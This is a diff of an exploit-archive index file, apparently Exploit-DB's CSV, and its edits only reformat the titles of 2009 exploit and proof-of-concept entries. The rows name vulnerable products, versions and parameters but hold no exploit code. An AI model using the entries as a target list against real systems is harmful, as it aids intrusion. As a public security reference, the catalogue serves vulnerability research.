+8190,platforms/windows/dos/8190.txt,"IBM Director 5.20.3su2 CIM Server - Remote DoS",2009-03-10,"Bernhard Mueller",windows,dos,0 +8191,platforms/multiple/remote/8191.txt,"NextApp Echo < 2.1.1 - XML Injection",2009-03-10,"SEC Consult",multiple,remote,0 8193,platforms/windows/local/8193.py,"RainbowPlayer 0.91 - (playlist) Universal SEH Overwrite Exploit",2009-03-10,His0k4,windows,local,0 8194,platforms/php/webapps/8194.txt,"PHP-Fusion Mod Book Panel - (course_id) SQL Injection",2009-03-10,SuB-ZeRo,php,webapps,0 8195,platforms/php/webapps/8195.txt,"WeBid 0.7.3 RC9 - Multiple Remote File Inclusion",2009-03-10,K-159,php,webapps,0 @@ -7715,9 +7715,9 @@ id,file,description,date,author,platform,type,port 8197,platforms/php/webapps/8197.txt,"Joomla Djice Shoutbox 1.0 - Permanent XSS",2009-03-10,XaDoS,php,webapps,0 8198,platforms/php/webapps/8198.pl,"RoomPHPlanning 1.6 - (userform.php) Create Admin User Exploit",2009-03-10,"Jonathan Salwan",php,webapps,0 8200,platforms/windows/remote/8200.pl,"GuildFTPd FTP Server 0.999.14 - Remote Delete Files Exploit",2009-03-10,"Jonathan Salwan",windows,remote,0 -8201,platforms/windows/local/8201.pl,"Foxit Reader 3.0 (Build 1301) - PDF Buffer Overflow Exploit (Univ.)",2009-03-13,SkD,windows,local,0 +8201,platforms/windows/local/8201.pl,"Foxit Reader 3.0 (Build 1301) - PDF Buffer Overflow Exploit (Universal)",2009-03-13,SkD,windows,local,0 8202,platforms/php/webapps/8202.htm,"Traidnt up 2.0 - (Cookie) Add Extension Bypass Exploit",2009-03-11,SP4rT,php,webapps,0 -8203,platforms/windows/remote/8203.pl,"POP Peeper 3.4.0.0 Date Remote Buffer Overflow Exploit",2009-03-12,"Jeremy Brown",windows,remote,0 +8203,platforms/windows/remote/8203.pl,"POP Peeper 3.4.0.0 - Date Remote Buffer Overflow Exploit",2009-03-12,"Jeremy Brown",windows,remote,0 8204,platforms/php/webapps/8204.txt,"phpmysport 1.4 - (XSS/SQL) Multiple Vulnerabilities",2009-03-12,XaDoS,php,webapps,0 8205,platforms/linux/dos/8205.pl,"JDKChat 1.5 - Remote Integer Overflow PoC",2009-03-12,n3tpr0b3,linux,dos,0 8206,platforms/windows/remote/8206.html,"GeoVision LiveAudio - ActiveX Remote Freed-Memory Access Exploit",2009-03-13,Nine:Situations:Group,windows,remote,0 @@ -7726,13 +7726,13 @@ id,file,description,date,author,platform,type,port 8209,platforms/php/webapps/8209.txt,"Kim Websites 1.0 - (Auth Bypass) SQL Injection",2009-03-13,"Virangar Security",php,webapps,0 8210,platforms/php/webapps/8210.txt,"UBB.threads 5.5.1 - (message) SQL Injection",2009-03-16,s4squatch,php,webapps,0 8211,platforms/windows/remote/8211.pl,"Serv-U 7.4.0.1 - (MKD) Create Arbitrary Directories Exploit",2009-03-16,"Jonathan Salwan",windows,remote,0 -8212,platforms/windows/dos/8212.pl,"Serv-U 7.4.0.1 - (SMNT) Denial of Service (post auth)",2009-03-16,"Jonathan Salwan",windows,dos,0 +8212,platforms/windows/dos/8212.pl,"Serv-U 7.4.0.1 - (SMNT) Post-Auth Denial of Service",2009-03-16,"Jonathan Salwan",windows,dos,0 8213,platforms/windows/dos/8213.pl,"VLC 0.9.8a - Web UI (input) Remote Denial of Service",2009-03-16,TheLeader,windows,dos,0 8214,platforms/windows/local/8214.c,"Rosoft Media Player 4.2.1 - Local Buffer Overflow Exploit (multi target)",2009-03-16,SimO-s0fT,windows,local,0 8215,platforms/windows/remote/8215.txt,"PPLive 1.9.21 - (/LoadModule) URI Handlers Argument Injection",2009-03-16,Nine:Situations:Group,windows,remote,0 8216,platforms/php/webapps/8216.txt,"Beerwin's PHPLinkAdmin 1.0 - RFI/SQL Injection",2009-03-16,SirGod,php,webapps,0 8217,platforms/php/webapps/8217.txt,"YAP 1.1.1 - Blind SQL Injection/SQL Injection",2009-03-16,SirGod,php,webapps,0 -8219,platforms/multiple/dos/8219.html,"Mozilla Firefox 3.0.7 OnbeforeUnLoad DesignMode Dereference Crash",2009-03-16,Skylined,multiple,dos,0 +8219,platforms/multiple/dos/8219.html,"Mozilla Firefox 3.0.7 - OnbeforeUnLoad DesignMode Dereference Crash",2009-03-16,Skylined,multiple,dos,0 8220,platforms/php/webapps/8220.txt,"phpComasy 0.9.1 - (entry_id) SQL Injection",2009-03-16,boom3rang,php,webapps,0 8224,platforms/windows/dos/8224.pl,"WinAsm Studio 5.1.5.0 - Local Heap Overflow PoC",2009-03-16,Stack,windows,dos,0 8225,platforms/windows/dos/8225.py,"Gretech GOM Encoder 1.0.0.11 - (.Subtitle) Buffer Overflow PoC",2009-03-16,"Encrypt3d.M!nd ",windows,dos,0 @@ -7757,7 +7757,7 @@ id,file,description,date,author,platform,type,port 8244,platforms/php/webapps/8244.txt,"Bloginator 1a - SQL Command Injection via Cookie Bypass Exploit",2009-03-19,Fireshot,php,webapps,0 8245,platforms/multiple/dos/8245.c,"SW-HTTPD Server 0.x - Remote Denial of Service",2009-03-19,"Jonathan Salwan",multiple,dos,0 8246,platforms/windows/local/8246.pl,"Chasys Media Player - (.lst playlist) Local Buffer Overflow Exploit",2009-03-19,zAx,windows,local,0 -8247,platforms/cgi/webapps/8247.txt,"Hannon Hill Cascade Server - Command Execution (Post Auth)",2009-03-19,"Emory University",cgi,webapps,0 +8247,platforms/cgi/webapps/8247.txt,"Hannon Hill Cascade Server - Command Execution (Post-Auth)",2009-03-19,"Emory University",cgi,webapps,0 8248,platforms/windows/remote/8248.py,"POP Peeper 3.4.0.0 - (From) Remote Buffer Overflow Exploit (SEH)",2009-03-20,His0k4,windows,remote,0 8249,platforms/windows/local/8249.php,"BS.Player 2.34 Build 980 - (.bsl) Local Buffer Overflow Exploit (SEH)",2009-03-20,Nine:Situations:Group,windows,local,0 8250,platforms/windows/local/8250.txt,"CloneCD/DVD ElbyCDIO.sys < 6.0.3.2 - Local Privilege Escalation Exploit",2009-03-20,"NT Internals",windows,local,0 @@ -7783,7 +7783,7 @@ id,file,description,date,author,platform,type,port 8270,platforms/windows/local/8270.pl,"eXeScope 6.50 - Local Buffer Overflow Exploit",2009-03-23,Koshi,windows,local,0 8271,platforms/php/webapps/8271.php,"Pluck CMS 4.6.1 - (module_pages_site.php post) LFI Exploit",2009-03-23,"Alfons Luja",php,webapps,0 8272,platforms/php/webapps/8272.pl,"Codice CMS 2 - SQL Command Execution Exploit",2009-03-23,darkjoker,php,webapps,0 -8273,platforms/windows/remote/8273.c,"Telnet-Ftp Service Server 1.x - (Post Auth) Multiple Vulnerabilities",2009-03-23,"Jonathan Salwan",windows,remote,0 +8273,platforms/windows/remote/8273.c,"Telnet-Ftp Service Server 1.x - (Post-Auth) Multiple Vulnerabilities",2009-03-23,"Jonathan Salwan",windows,remote,0 8274,platforms/windows/local/8274.pl,"POP Peeper 3.4.0.0 - (.eml) Universal SEH Overwrite Exploit",2009-03-23,Stack,windows,local,0 8275,platforms/windows/local/8275.pl,"POP Peeper 3.4.0.0 - (.htm)l Universal SEH Overwrite Exploit",2009-03-23,Stack,windows,local,0 8276,platforms/php/webapps/8276.pl,"Syzygy CMS 0.3 - LFI/SQL Command Injection Exploit",2009-03-23,Osirys,php,webapps,0 @@ -7793,7 +7793,7 @@ id,file,description,date,author,platform,type,port 8280,platforms/windows/local/8280.txt,"Adobe Acrobat Reader - JBIG2 Universal Exploit (Bind Shell Port 5500)",2009-03-24,"Black Security",windows,local,0 8281,platforms/windows/dos/8281.txt,"Microsoft GdiPlus - EMF GpFont.SetData Integer Overflow PoC",2009-03-24,"Black Security",windows,dos,0 8282,platforms/php/webapps/8282.txt,"SurfMyTV Script 1.0 - (view.php id) SQL Injection",2009-03-24,x0r,php,webapps,0 -8283,platforms/windows/remote/8283.c,"Femitter FTP Server 1.x - (Post Auth) Multiple Vulnerabilities",2009-03-24,"Jonathan Salwan",windows,remote,0 +8283,platforms/windows/remote/8283.c,"Femitter FTP Server 1.x - (Post-Auth) Multiple Vulnerabilities",2009-03-24,"Jonathan Salwan",windows,remote,0 8284,platforms/windows/remote/8284.pl,"IncrediMail 5.86 - (XSS) Script Execution Exploit",2009-03-24,"Bui Quang Minh",windows,remote,0 8285,platforms/multiple/dos/8285.txt,"Mozilla Firefox XSL - Parsing Remote Memory Corruption PoC (0Day)",2009-03-25,"Guido Landi",multiple,dos,0 8287,platforms/php/webapps/8287.php,"PHPizabi 0.848b C1 HFP1-3 - Remote Arbitrary File Upload Exploit",2009-03-25,EgiX,php,webapps,0 @@ -7822,7 +7822,7 @@ id,file,description,date,author,platform,type,port 8310,platforms/windows/dos/8310.pl,"Sami HTTP Server 2.x - (HEAD) Remote Denial of Service",2009-03-30,"Jonathan Salwan",windows,dos,0 8311,platforms/windows/local/8311.py,"Abee Chm eBook Creator 2.11 - (FileName) Local Stack Overflow Exploit",2009-03-30,"Encrypt3d.M!nd ",windows,local,0 8312,platforms/windows/local/8312.py,"AtomixMP3 <= 2.3 - (playlist) Universal SEH Overwrite Exploit",2009-03-30,His0k4,windows,local,0 -8313,platforms/hardware/dos/8313.txt,"Check Point Firewall-1 PKI Web Service HTTP Header Remote Overflow",2009-03-30,"Bugs NotHugs",hardware,dos,0 +8313,platforms/hardware/dos/8313.txt,"Check Point Firewall-1 - PKI Web Service HTTP Header Remote Overflow",2009-03-30,"Bugs NotHugs",hardware,dos,0 8314,platforms/windows/dos/8314.php,"Amaya 11.1 - W3C Editor/Browser (defer) Stack Overflow PoC",2009-03-30,"Alfons Luja",windows,dos,0 8315,platforms/php/webapps/8315.txt,"gravy media CMS 1.07 - Multiple Vulnerabilities",2009-03-30,x0r,php,webapps,0 8316,platforms/hardware/remote/8316.txt,"NOKIA Siemens FlexiISN 3.1 - Multiple Auth Bypass Vulnerabilities",2009-03-30,TaMBaRuS,hardware,remote,0 @@ -7845,30 +7845,30 @@ id,file,description,date,author,platform,type,port 8333,platforms/multiple/dos/8333.txt,"Sun Calendar Express Web Server - (DoS/XSS) Multiple Remote Vulnerabilities",2009-03-31,"Core Security",multiple,dos,0 8334,platforms/php/webapps/8334.txt,"Koschtit Image Gallery 1.82 - Multiple Local File Inclusion",2009-04-01,ahmadbady,php,webapps,0 8335,platforms/windows/dos/8335.c,"DeepBurner 1.9.0.228 - Stack Buffer Overflow (SEH) PoC",2009-04-01,"fl0 fl0w",windows,dos,0 -8336,platforms/windows/remote/8336.pl,"Oracle WebLogic IIS connector JSESSIONID Remote Overflow Exploit",2009-04-01,"Guido Landi",windows,remote,0 +8336,platforms/windows/remote/8336.pl,"Oracle WebLogic IIS connector JSESSIONID - Remote Overflow Exploit",2009-04-01,"Guido Landi",windows,remote,0 8337,platforms/multiple/dos/8337.c,"XBMC 8.10 - (GET Requests) Multiple Remote Buffer Overflow PoC",2009-04-01,n00b,multiple,dos,0 8338,platforms/windows/remote/8338.py,"XBMC 8.10 - (GET Request) Remote Buffer Overflow Exploit (Windows)",2009-04-01,n00b,windows,remote,80 8339,platforms/windows/remote/8339.py,"XBMC 8.10 - (takescreenshot) Remote Buffer Overflow Exploit",2009-04-01,n00b,windows,remote,80 8340,platforms/windows/remote/8340.py,"XBMC 8.10 - (get tag from file name) Remote Buffer Overflow Exploit",2009-04-01,n00b,windows,remote,80 8341,platforms/php/webapps/8341.txt,"MyioSoft Ajax Portal 3.0 - (page) SQL Injection",2009-04-01,cOndemned,php,webapps,0 8342,platforms/php/webapps/8342.txt,"TinyPHPForum 3.61 - File Disclosure / Code Execution",2009-04-01,brain[pillow],php,webapps,0 -8343,platforms/windows/local/8343.pl,"UltraISO 9.3.3.2685 CCD/IMG Universal Buffer Overflow Exploit",2009-04-03,SkD,windows,local,0 +8343,platforms/windows/local/8343.pl,"UltraISO 9.3.3.2685 - CCD/IMG Universal Buffer Overflow Exploit",2009-04-03,SkD,windows,local,0 8344,platforms/multiple/dos/8344.py,"IBM DB2 < 9.5 pack 3a - Connect Denial of Service",2009-04-03,"Dennis Yurichev",multiple,dos,0 8345,platforms/multiple/dos/8345.py,"IBM DB2 < 9.5 pack 3a - Data Stream Denial of Service",2009-04-03,"Dennis Yurichev",multiple,dos,0 8346,platforms/php/webapps/8346.txt,"ActiveKB Knowledgebase - (loadpanel.php Panel) Local File Inclusion",2009-04-03,"Angela Chang",php,webapps,0 8347,platforms/php/webapps/8347.php,"glFusion 1.1.2 - COM_applyFilter()/cookies Blind SQL Injection",2009-04-03,Nine:Situations:Group,php,webapps,0 8348,platforms/php/webapps/8348.txt,"form2list - (page.php id) SQL Injection",2009-04-03,Cyber-Zone,php,webapps,0 8349,platforms/php/webapps/8349.c,"Family Connections 1.8.2 - Remote Shell Upload Exploit",2009-04-03,"Salvatore Fresta",php,webapps,0 -8350,platforms/php/webapps/8350.txt,"Gravity Board X 2.0b - SQL Injection / Post Auth Code Execution",2009-04-03,brain[pillow],php,webapps,0 +8350,platforms/php/webapps/8350.txt,"Gravity Board X 2.0b - SQL Injection / Post-Auth Code Execution",2009-04-03,brain[pillow],php,webapps,0 8351,platforms/php/webapps/8351.pl,"AdaptBB 1.0 - (topic_id) SQL Injection / Credentials Disclosure Exploit",2009-04-03,StAkeR,php,webapps,0 -8352,platforms/windows/dos/8352.txt,"Amaya 11.1 XHTML Parser Remote Buffer Overflow PoC",2009-04-06,cicatriz,windows,dos,0 +8352,platforms/windows/dos/8352.txt,"Amaya 11.1 - XHTML Parser Remote Buffer Overflow PoC",2009-04-06,cicatriz,windows,dos,0 8353,platforms/php/webapps/8353.txt,"Joomla Component com_bookjoomlas 0.1 - SQL Injection",2009-04-06,"Salvatore Fresta",php,webapps,0 8354,platforms/windows/remote/8354.py,"XBMC 8.10 - GET Request Remote Buffer Overflow Exploit (SEH) (univ)",2009-04-06,n00b,windows,remote,80 8355,platforms/php/webapps/8355.txt,"FlexCMS Calendar - (ItemId) Blind SQL Injection",2009-04-06,Lanti-Net,php,webapps,0 8356,platforms/windows/dos/8356.txt,"Mozilla Firefox XSL - Parsing Remote Memory Corruption PoC (2)",2009-04-06,DATA_SNIPER,windows,dos,0 8357,platforms/php/webapps/8357.py,"iDB 0.2.5pa SVN 243 - (skin) Local File Inclusion Exploit",2009-04-06,LOTFREE,php,webapps,0 8358,platforms/windows/dos/8358.pl,"UltraISO 9.3.3.2685 - (.ui) Off By One / Buffer Overflow PoC",2009-04-06,Stack,windows,dos,0 -8359,platforms/hardware/remote/8359.py,"Pirelli Discus DRG A225 wifi router WPA2PSK Default Algorithm Exploit",2009-04-06,j0rgan,hardware,remote,0 +8359,platforms/hardware/remote/8359.py,"Pirelli Discus DRG A225 wifi router - WPA2PSK Default Algorithm Exploit",2009-04-06,j0rgan,hardware,remote,0 8360,platforms/windows/dos/8360.pl,"Unsniff Network Analyzer 1.0 - (usnf) Local Heap Overflow PoC",2009-04-06,LiquidWorm,windows,dos,0 8361,platforms/php/webapps/8361.txt,"Family Connections CMS 1.8.2 - Blind SQL Injection",2009-04-07,"Salvatore Fresta",php,webapps,0 8362,platforms/php/webapps/8362.php,"Lanius CMS 0.5.2 - Remote Arbitrary File Upload Exploit",2009-04-07,EgiX,php,webapps,0 @@ -7879,7 +7879,7 @@ id,file,description,date,author,platform,type,port 8367,platforms/php/webapps/8367.txt,"Joomla Component Cmimarketplace - (viewit) Directory Traversal",2009-04-08,H!tm@N,php,webapps,0 8368,platforms/windows/remote/8368.txt,"peterConnects Web Server - Traversal Arbitrary File Access",2009-04-08,"Bugs NotHugs",windows,remote,0 8369,platforms/linux/local/8369.sh,"Linux Kernel < 2.6.29 - exit_notify() Local Privilege Escalation Exploit",2009-04-08,gat3way,linux,local,0 -8370,platforms/windows/dos/8370.pl,"GOM Player 2.1.16.6134 Subtitle Local Buffer Overflow PoC",2009-04-08,"Bui Quang Minh",windows,dos,0 +8370,platforms/windows/dos/8370.pl,"GOM Player 2.1.16.6134 - Subtitle Local Buffer Overflow PoC",2009-04-08,"Bui Quang Minh",windows,dos,0 8371,platforms/windows/local/8371.pl,"OTSTurntables 1.00.027 - (.m3u/.ofl) Universal BoF Exploit",2009-04-08,AlpHaNiX,windows,local,0 8372,platforms/php/webapps/8372.txt,"photo graffix 3.4 - Multiple Vulnerabilities",2009-04-08,ahmadbady,php,webapps,0 8373,platforms/php/webapps/8373.txt,"Xplode CMS - (wrap_script) SQL Injection",2009-04-08,PLATEN,php,webapps,0 @@ -7900,7 +7900,7 @@ id,file,description,date,author,platform,type,port 8390,platforms/windows/dos/8390.cpp,"Xilisoft Video Converter Wizard 3 - (.cue) Stack Buffer Overflow PoC",2009-04-10,"fl0 fl0w",windows,dos,0 8391,platforms/windows/dos/8391.txt,"Chance-i DiViS-Web DVR System - ActiveX Control Heap Overflow PoC",2009-04-10,DSecRG,windows,dos,0 8392,platforms/windows/remote/8392.txt,"Chance-i DiViS DVR System Web-server Directory Traversal",2009-04-10,DSecRG,windows,remote,0 -8393,platforms/hardware/dos/8393.txt,"Cisco ASA/PIX Appliances Fail to Properly Check Fragmented TCP Packets",2009-04-10,"Daniel Clemens",hardware,dos,0 +8393,platforms/hardware/dos/8393.txt,"Cisco ASA/PIX - Appliances Fail to Properly Check Fragmented TCP Packets",2009-04-10,"Daniel Clemens",hardware,dos,0 8394,platforms/php/webapps/8394.txt,"mozilocms 1.11 - (LFI/pd/XSS) Multiple Vulnerabilities",2009-04-10,SirGod,php,webapps,0 8395,platforms/php/webapps/8395.txt,"Redaxscript 0.2.0 - (language) Local File Inclusion",2009-04-10,SirGod,php,webapps,0 8396,platforms/php/webapps/8396.pl,"w3bcms Gaestebuch 3.0.0 - Blind SQL Injection",2009-04-10,DNX,php,webapps,0 @@ -7936,7 +7936,7 @@ id,file,description,date,author,platform,type,port 8427,platforms/windows/local/8427.py,"Easy RM to MP3 Converter - Universal Stack Overflow Exploit",2009-04-14,Stack,windows,local,0 8428,platforms/windows/remote/8428.txt,"MonGoose 2.4 (Windows) - Webserver Directory Traversal",2009-04-14,e.wiZz!,windows,remote,0 8429,platforms/multiple/dos/8429.pl,"Steamcast 0.9.75b - Remote Denial of Service",2009-04-14,ksa04,multiple,dos,0 -8430,platforms/openbsd/dos/8430.py,"OpenBSD 4.5 IP datagram Null Pointer Deref Denial of Service",2009-04-14,nonroot,openbsd,dos,0 +8430,platforms/openbsd/dos/8430.py,"OpenBSD 4.5 - IP datagram Null Pointer Deref Denial of Service",2009-04-14,nonroot,openbsd,dos,0 8431,platforms/php/webapps/8431.txt,"GuestCal 2.1 - (index.php lang) Local File Inclusion",2009-04-14,SirGod,php,webapps,0 8432,platforms/php/webapps/8432.txt,"Aqua CMS - (username) SQL Injection",2009-04-14,halkfild,php,webapps,0 8433,platforms/php/webapps/8433.txt,"RQms (Rash) 1.2.2 - Multiple SQL Injection",2009-04-14,Dimi4,php,webapps,0 @@ -7968,14 +7968,14 @@ id,file,description,date,author,platform,type,port 8459,platforms/php/webapps/8459.htm,"eLitius 1.0 - (manage-admin.php) Add Admin/Change Password Exploit",2009-04-16,"ThE g0bL!N",php,webapps,0 8460,platforms/php/webapps/8460.txt,"SMA-DB 0.3.13 - Multiple Remote File Inclusion",2009-04-16,JosS,php,webapps,0 8461,platforms/php/webapps/8461.txt,"chCounter 3.1.3 - (Login Bypass) SQL Injection",2009-04-16,tmh,php,webapps,0 -8462,platforms/windows/dos/8462.pl,"MagicISO CCD/Cue Local Heap Overflow Exploit PoC",2009-04-16,Stack,windows,dos,0 +8462,platforms/windows/dos/8462.pl,"MagicISO CCD/Cue - Local Heap Overflow Exploit PoC",2009-04-16,Stack,windows,dos,0 8463,platforms/windows/remote/8463.txt,"Zervit Web Server 0.02 - Remote Directory Traversal",2009-04-16,e.wiZz!,windows,remote,0 8464,platforms/php/webapps/8464.txt,"Tiny Blogr 1.0.0 rc4 - (Auth Bypass) SQL Injection",2009-04-17,"Salvatore Fresta",php,webapps,0 8465,platforms/windows/dos/8465.pl,"Microsoft Media Player - (quartz.dll .mid) Denial of Service",2009-04-17,"Code Audit Labs",windows,dos,0 8466,platforms/windows/dos/8466.pl,"Microsoft GDI Plugin - .png Infinite Loop Denial of Service PoC",2009-04-17,"Code Audit Labs",windows,dos,0 8467,platforms/windows/dos/8467.pl,"Microsoft Media Player - (quartz.dll .wav) Multiple Remote DoS Vulnerabilities",2009-04-17,"Code Audit Labs",windows,dos,0 8468,platforms/php/webapps/8468.txt,"Limbo CMS 1.0.4.2 - CSRF Privilege Escalation PoC",2009-04-17,"Alfons Luja",php,webapps,0 -8469,platforms/linux/dos/8469.c,"XRDP 0.4.1 - Remote Buffer Overflow PoC (pre-auth)",2009-04-17,"joe walko",linux,dos,0 +8469,platforms/linux/dos/8469.c,"XRDP 0.4.1 - Pre-Auth Remote Buffer Overflow PoC",2009-04-17,"joe walko",linux,dos,0 8470,platforms/linux/local/8470.py,"cTorrent/DTorrent - (.Torrent) Buffer Overflow Exploit",2009-04-17,"Michael Brooks",linux,local,0 8471,platforms/php/webapps/8471.txt,"ClanTiger < 1.1.1 - Multiple Cookie Handling Vulnerabilities",2009-04-17,YEnH4ckEr,php,webapps,0 8472,platforms/php/webapps/8472.txt,"ClanTiger 1.1.1 - (Auth Bypass) SQL Injection",2009-04-17,YEnH4ckEr,php,webapps,0 @@ -7996,7 +7996,7 @@ id,file,description,date,author,platform,type,port 8487,platforms/php/webapps/8487.txt,"EZ Webitor - (Auth Bypass) SQL Injection",2009-04-20,snakespc,php,webapps,0 8488,platforms/php/webapps/8488.pl,"Pligg 9.9.0 - (editlink.php id) Blind SQL Injection",2009-04-20,"Rohit Bansal",php,webapps,0 8489,platforms/windows/dos/8489.pl,"CoolPlayer Portable 2.19.1 - (.m3u) Local Stack Overflow PoC",2009-04-20,GoLd_M,windows,dos,0 -8490,platforms/hardware/dos/8490.sh,"Addonics NAS Adapter - (bts.cgi) Remote Denial of Service (Post-Auth)",2009-04-20,h00die,hardware,dos,0 +8490,platforms/hardware/dos/8490.sh,"Addonics NAS Adapter - (bts.cgi) Post-Auth Remote Denial of Service",2009-04-20,h00die,hardware,dos,0 8491,platforms/php/webapps/8491.pl,"WysGui CMS 1.2b - (Insecure Cookie Handling) Blind SQL Injection",2009-04-20,YEnH4ckEr,php,webapps,0 8492,platforms/php/webapps/8492.txt,"WB News 2.1.2 - Insecure Cookie Handling",2009-04-20,"ThE g0bL!N",php,webapps,0 8493,platforms/php/webapps/8493.txt,"fungamez rc1 - (ab/LFI) Multiple Vulnerabilities",2009-04-20,YEnH4ckEr,php,webapps,0 @@ -8029,7 +8029,7 @@ id,file,description,date,author,platform,type,port 8520,platforms/windows/local/8520.py,"CoolPlayer Portable 2.19.1 - (m3u) Buffer Overflow Exploit (2)",2009-04-22,His0k4,windows,local,0 8521,platforms/php/webapps/8521.txt,"fowlcms 1.1 - (ab/LFI/su) Multiple Vulnerabilities",2009-04-23,YEnH4ckEr,php,webapps,0 8522,platforms/windows/dos/8522.pl,"Zervit Web Server 0.3 - (sockets++ crash) Remote Denial of Service",2009-04-22,"Jonathan Salwan",windows,dos,0 -8523,platforms/windows/dos/8523.txt,"Norton Ghost Support module for EasySetup wizard Remote DoS PoC",2009-04-23,shinnai,windows,dos,0 +8523,platforms/windows/dos/8523.txt,"Norton Ghost Support module for EasySetup wizard - Remote DoS PoC",2009-04-23,shinnai,windows,dos,0 8524,platforms/windows/dos/8524.txt,"Home Web Server r1.7.1 - (build 147) Gui Thread-Memory Corruption",2009-04-23,Aodrulez,windows,dos,0 8525,platforms/windows/remote/8525.pl,"Dream FTP Server 1.02 - (users.dat) Arbitrary File Disclosure Exploit",2009-04-23,Cyber-Zone,windows,remote,0 8526,platforms/windows/dos/8526.py,"Popcorn 1.87 - Remote Heap Overflow Exploit PoC",2009-04-23,x.CJP.x,windows,dos,0 @@ -8059,7 +8059,7 @@ id,file,description,date,author,platform,type,port 8551,platforms/php/webapps/8551.txt,"Teraway FileStream 1.0 - Insecure Cookie Handling",2009-04-27,"ThE g0bL!N",php,webapps,0 8552,platforms/php/webapps/8552.txt,"Teraway LiveHelp 2.0 - Insecure Cookie Handling",2009-04-27,"ThE g0bL!N",php,webapps,0 8553,platforms/php/webapps/8553.htm,"Teraway LinkTracker 1.0 - Remote Password Change Exploit",2009-04-27,"ThE g0bL!N",php,webapps,0 -8554,platforms/windows/remote/8554.py,"Belkin Bulldog Plus HTTP Server Remote Buffer Overflow Exploit",2009-04-27,His0k4,windows,remote,80 +8554,platforms/windows/remote/8554.py,"Belkin Bulldog Plus - HTTP Server Remote Buffer Overflow Exploit",2009-04-27,His0k4,windows,remote,80 8555,platforms/php/webapps/8555.txt,"ABC Advertise 1.0 - Admin Password Disclosure",2009-04-27,SirGod,php,webapps,0 8556,platforms/linux/remote/8556.c,"Linux Kernel 2.6.20 / 2.6.24 / 2.6.27_7-10 (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remote Exploit",2009-04-28,sgrakkyu,linux,remote,0 8557,platforms/php/webapps/8557.htm,"VisionLms 1.0 - (changePW.php) Remote Password Change Exploit",2009-04-28,Mr.tro0oqy,php,webapps,0 @@ -8197,8 +8197,8 @@ id,file,description,date,author,platform,type,port 8691,platforms/php/webapps/8691.txt,"2DayBiz Template Monster Clone - 'edituser.php' Change Pass Exploit",2009-05-14,TiGeR-Dz,php,webapps,0 8692,platforms/php/webapps/8692.txt,"MRCGIGUY SimpLISTic SQL 2.0.0 - Insecure Cookie Handling",2009-05-14,"ThE g0bL!N",php,webapps,0 8694,platforms/php/webapps/8694.txt,"MRCGIGUY Top Sites 1.0.0 - Insecure Cookie Handling",2009-05-14,"ThE g0bL!N",php,webapps,0 -8695,platforms/multiple/dos/8695.txt,"Eggdrop/Windrop 1.6.19 ctcpbuf Remote Crash",2009-05-15,"Thomas Sader",multiple,dos,0 -8696,platforms/hardware/remote/8696.txt,"D-Link Products Captcha Bypass",2009-05-15,"SourceSec Dev Team",hardware,remote,0 +8695,platforms/multiple/dos/8695.txt,"Eggdrop/Windrop 1.6.19 - ctcpbuf Remote Crash",2009-05-15,"Thomas Sader",multiple,dos,0 +8696,platforms/hardware/remote/8696.txt,"D-Link Products - Captcha Bypass",2009-05-15,"SourceSec Dev Team",hardware,remote,0 8697,platforms/php/webapps/8697.txt,"Joomla Component ArtForms 2.1 b7 - Remote File Inclusion",2009-05-15,iskorpitx,php,webapps,0 8698,platforms/windows/local/8698.pl,"Audioactive Player 1.93b - (.m3u) Local Buffer Overflow Exploit",2009-05-15,hack4love,windows,local,0 8699,platforms/php/webapps/8699.php,"Harland Scripts 11 - Products Remote Command Execution Exploit",2009-05-15,G4N0K,php,webapps,0 @@ -8206,7 +8206,7 @@ id,file,description,date,author,platform,type,port 8701,platforms/windows/local/8701.py,"Audioactive Player 1.93b - (.m3u) Local Buffer Overflow Exploit (SEH)",2009-05-15,His0k4,windows,local,0 8702,platforms/php/webapps/8702.txt,"2DayBiz Custom T-shirt Design - (SQL/XSS) Multiple Remote Vulnerabilities",2009-05-15,snakespc,php,webapps,0 8704,platforms/windows/remote/8704.txt,"Microsoft IIS 6.0 WebDAV - Remote Authentication Bypass",2009-05-15,kingcope,windows,remote,0 -8705,platforms/asp/webapps/8705.txt,"DMXReady Registration Manager 1.1 Database Disclosure",2009-05-15,S4S-T3rr0r!sT,asp,webapps,0 +8705,platforms/asp/webapps/8705.txt,"DMXReady Registration Manager 1.1 - Database Disclosure",2009-05-15,S4S-T3rr0r!sT,asp,webapps,0 8706,platforms/php/webapps/8706.pl,"PHPenpals 1.1 - (mail.php ID) SQL Injection",2009-05-15,Br0ly,php,webapps,0 8707,platforms/php/webapps/8707.txt,"my-colex 1.4.2 - (ab/XSS/SQL) Multiple Vulnerabilities",2009-05-15,YEnH4ckEr,php,webapps,0 8708,platforms/php/webapps/8708.txt,"my-gesuad 0.9.14 - (ab/SQL/XSS) Multiple Vulnerabilities",2009-05-15,YEnH4ckEr,php,webapps,0 @@ -8228,7 +8228,7 @@ id,file,description,date,author,platform,type,port 8725,platforms/php/webapps/8725.php,"Jieqi CMS 1.5 - Remote Code Execution Exploit",2009-05-18,Securitylab.ir,php,webapps,0 8726,platforms/asp/webapps/8726.txt,"MaxCMS 2.0 - (inc/ajax.asp) SQL Injection",2009-05-18,Securitylab.ir,asp,webapps,0 8727,platforms/php/webapps/8727.txt,"DGNews 3.0 Beta - (id) SQL Injection",2009-05-18,Cyber-Zone,php,webapps,0 -8728,platforms/php/webapps/8728.htm,"PHP Article Publisher Remote Change Admin Password Exploit",2009-05-18,ahmadbady,php,webapps,0 +8728,platforms/php/webapps/8728.htm,"PHP Article Publisher - Remote Change Admin Password Exploit",2009-05-18,ahmadbady,php,webapps,0 8730,platforms/php/webapps/8730.txt,"VidShare Pro - Arbitrary Shell Upload",2009-05-19,InjEctOr5,php,webapps,0 8731,platforms/php/webapps/8731.php,"Joomla com_gsticketsystem - (catid) Blind SQL Injection",2009-05-19,InjEctOr5,php,webapps,0 8732,platforms/windows/remote/8732.py,"httpdx 0.5b FTP Server - (CWD) Remote BoF Exploit (SEH)",2009-05-19,His0k4,windows,remote,21 @@ -8282,7 +8282,7 @@ id,file,description,date,author,platform,type,port 8782,platforms/windows/local/8782.txt,"ArcaVir 2009 < 9.4.320X.9 - (ps_drv.sys) Local Privilege Escalation Exploit",2009-05-26,"NT Internals",windows,local,0 8783,platforms/windows/local/8783.c,"Winamp 5.551 - MAKI Parsing Integer Overflow Exploit",2009-05-26,n00b,windows,local,0 8784,platforms/php/webapps/8784.txt,"vBulletin vbBux/vbPlaza 2.x - (vbplaza.php) Blind SQL Injection",2009-05-26,"Cold Zero",php,webapps,0 